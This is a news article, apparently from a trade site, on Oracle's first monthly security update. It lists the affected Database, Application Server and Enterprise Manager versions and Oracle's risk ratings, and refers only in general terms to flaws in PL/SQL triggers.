Article

Oracle releases first security update in new monthly cycle

Bill Brenner

Oracle Corp. released fixes Tuesday for multiple security holes in Enterprise Manager, Database Server and Application Server. It was the first security update in the company's new monthly patching cycle.

"Providing

    Requires Free Membership to View

customers with information and workarounds for security vulnerabilities is vital to protecting information systems," Oracle said in a statement Tuesday. "To that end, Oracle is informing customers that potential security vulnerabilities have been discovered in Oracle's Database and Application Server and Enterprise Manager products. Oracle recommends that customers apply patches for these potential vulnerabilities."

The Redwood Shores, Calif.-based company said the vulnerabilities affect:

  • Oracle Database 10g Release 1, version 10.1.0.2
  • Oracle9i Database Server Release 2, versions 9.2.0.4 and 9.2.0.5
  • Oracle9i Database Server Release 1, versions 9.0.1.4, 9.0.1.5 and 9.0.4
  • Oracle8i Database Server Release 3, version 8.1.7.4
  • Oracle Enterprise Manager Grid Control 10g, version 10.1.0.2
  • Oracle Enterprise Manager Database Control 10g, version 10.1.0.2
  • Oracle Application Server 10g (9.0.4), versions 9.0.4.0 and 9.0.4.1
  • Oracle9i Application Server Release 2, versions 9.0.2.3 and 9.0.3.1
  • Oracle9i Application Server Release 1, version 1.0.2.2

Oracle said of the vulnerabilities in the Database and Application servers, "The unpatched exposure risk is high; exploiting some of these vulnerabilities requires network access, but no valid user account." Of the Enterprise Manager vulnerabilities, the company said, "The unpatched exposure risk is medium; exploiting these vulnerabilities requires a valid operating system user account on the Enterprise Manager host."

Other Oracle stories

Oracle users: Monthly patch cycle prudent

Rob Sherman has never liked Microsoft's monthly patching cycle. Whether a fix is available or not, he wants to be told about security holes immediately so he knows what to watch for.

Multiple critical flaws identified in Oracle

Thirty-four vulnerabilities -- the majority of them critical -- have been identified in multiple versions of Oracle's database server.

Some patches "eliminate vulnerabilities in the Database Server and the Listener." Others plug holes "in the Portal and iSQL*Plus components of Oracle Application Server." The rest fix vulnerabilities in Enterprise Manager. The security bulletin does not outline what the specific security holes are or what an attacker could accomplish by exploiting them. But David Litchfield, a researcher at U.K.-based NGSSoftware, discussed the vulnerabilities his company discovered at length during July's Black Hat Briefings in Las Vegas. Generally, he said, the flaws have to do with the Procedural Language/Structured Query Language and its triggers. One flaw allows an attacker to gain control of the database server without a userID or password, while others could allow a low-privileged user to take over the database server.

Oracle's bulletin added that "all Collaboration Suite customers should apply the Oracle Database patches to their Information Storage database and the Oracle Application Server-embedded database. Collaboration Suite customers should also apply the application server patch to the Oracle Application Server infrastructure installation and to each Collaboration Suite middle tier installation. Collaboration Suite customers that have upgraded their Information Storage database to version Oracle Database 10g Release 1, version 10.1.0.2 should also apply the Enterprise Manager patch."

Further, it said, "E-Business Suite Release 11i customers should apply the available Oracle Database patches to their current Oracle Database Servers, which should be one of the following: Oracle8i Database Server Release 3, version 8.1.7.4; Oracle9i Database Server Release 2, version 9.2.0.4; and Oracle9i Database Server Release 2, version 9.2.0.5. E-Business Suite Release 11i customers should also apply the Oracle Application Server patch to their current Oracle Application Server releases, which should be one of the following: Oracle9i Application Server Release 1, version 1.0.2.2; and Oracle Application Server 10g (9.0.4), version 9.0.4.0."

Oracle announced its decision to do monthly security updates two weeks ago after news of 34 vulnerabilities in multiple versions of its database server -- the majority of them critical -- were widely reported. An Oracle spokesperson had earlier acknowledged the decision was hastened by Litchfield's announcement of the flaws.


There are Comments. Add yours.

 
TIP: Want to include a code block in your comment? Use <pre> or <code> tags around the desired text. Ex: <code>insert code</code>

REGISTER or login:

Forgot Password?
By submitting you agree to receive email from TechTarget and its partners. If you reside outside of the United States, you consent to having your personal data transferred to and processed in the United States. Privacy
Sort by: OldestNewest

Forgot Password?

No problem! Submit your e-mail address below. We'll send you an email containing your password.

Your password has been sent to: